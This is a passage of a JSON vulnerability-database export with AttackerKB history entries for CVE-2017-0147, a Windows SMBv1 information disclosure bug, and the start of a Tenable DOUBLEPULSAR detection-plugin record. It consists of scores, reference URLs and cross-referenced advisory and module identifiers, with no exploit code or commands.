"https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": null, "lastseen": "2020-11-22T06:09:46", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 2, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["cvelist"], "edition": 1, "lastseen": "2020-11-22T06:09:46"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0022"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n 
\n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2021-04-25T03:16:40", "references": [{"idList": ["MS:CVE-2017-0022", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389", "KB4010321"], "type": "mskb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96069"], "type": "symantec"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["KLA11833", "KLA10989", "KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810623", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-022.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0022"], "type": "cve"}, {"idList": ["AKB:5F5C5750-439B-4E16-AC48-8D321C492FDE", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": 
["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-04-25T03:16:40", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "f7e7b0c9c17690b7114e3847a36138c1", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": null, "lastseen": "2021-04-25T03:16:40", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 2, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["cvelist"], "edition": 2, "lastseen": "2021-04-25T03:16:40"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 
SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2021-05-06T15:18:17", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", 
"ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, 
{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-05-06T15:18:17", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "308761069da5e59b07bb4a3defb40c48", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": "2000-01-01T10:00:00", "lastseen": "2021-05-06T15:18:17", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.6", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": 
["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.securityfocus.com/bid/96709"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 3, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "description", "attackerkb"], "edition": 4, "lastseen": "2021-05-06T15:18:17"}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": 
"threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}], "modified": "2021-07-20T20:12:25", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-07-20T20:12:25", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.securityfocus.com/bid/96709"], "Advisory": ["https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": [], "mitre_vector": {}, "last_activity": "2020-11-22T03:08:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "9e3184b090a916875fe172879504df32"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "76174974a44b129dc7cb9905e72bee93"}, {"key": "href", "hash": "b981c43af3b615a415964e8db3de7b8e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "33304c5ad4f24166080d70e5d2fa6357"}, {"key": "published", "hash": "0404a0b8374966187f59ed4a2b846395"}, {"key": "references", "hash": "39066d294b8fbf1c3a8cec09d69adbc3"}, {"key": "reporter", "hash": "5e5266bea17c39e5ee12abd5fcbf7c2b"}, {"key": "title", "hash": "86a69a73afce6263b58d42af8e129794"}, {"key": "type", "hash": "dbbc8fce9a59d0a898c44c4f99244f4a"}], "scheme": null}], "nessus": [{"id": "700059.PRM", "hash": "26f8fbe66236fbc6cfd107f6fdddfb36", "type": "nessus", "bulletinFamily": "scanner", "title": "SMB Server DOUBLEPULSAR Backdoor / Implant Detection (EternalRocks)", "description": "NNM detected the presence of DOUBLEPULSAR on the remote Windows host. DOUBLEPULSAR is one of multiple Equation Group SMB implants and backdoors disclosed on 2017/04/14 by a group known as the 'Shadow Brokers'. 
The implant allows an unauthenticated, remote attacker to use SMB as a covert channel to exfiltrate data, launch remote commands, or execute arbitrary code.", "published": "2017-04-18T00:00:00", "modified": "2019-04-22T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700059", "reporter": "Tenable", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-mar.aspx", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://github.com/countercept/doublepulsar-detection-script", "http://thehackernews.com/2017/03/microsoft-patch-tuesday.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:37:13", "history": [{"bulletin": {"id": "700059.PRM", "hash": "d9b91673eb08511cfd8fbf38d5c34ff3", "type": "nessus", "bulletinFamily": "scanner", "title": "SMB Server DOUBLEPULSAR Backdoor / Implant Detection (EternalRocks)", "description": "NNM detected the presence of DOUBLEPULSAR on the remote Windows host. DOUBLEPULSAR is one of multiple Equation Group SMB implants and backdoors disclosed on 2017/04/14 by a group known as the 'Shadow Brokers'. 
The implant allows an unauthenticated, remote attacker to use SMB as a covert channel to exfiltrate data, launch remote commands, or execute arbitrary code.", "published": "2017-04-18T00:00:00", "modified": "2019-04-22T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700059", "reporter": "Tenable", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://github.com/countercept/doublepulsar-detection-script", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://technet.microsoft.com/en-us/library/security/ms17-mar.aspx", "http://thehackernews.com/2017/03/microsoft-patch-tuesday.html", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:58:48", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27803"]}, {"type": "rapid7community", "idList": 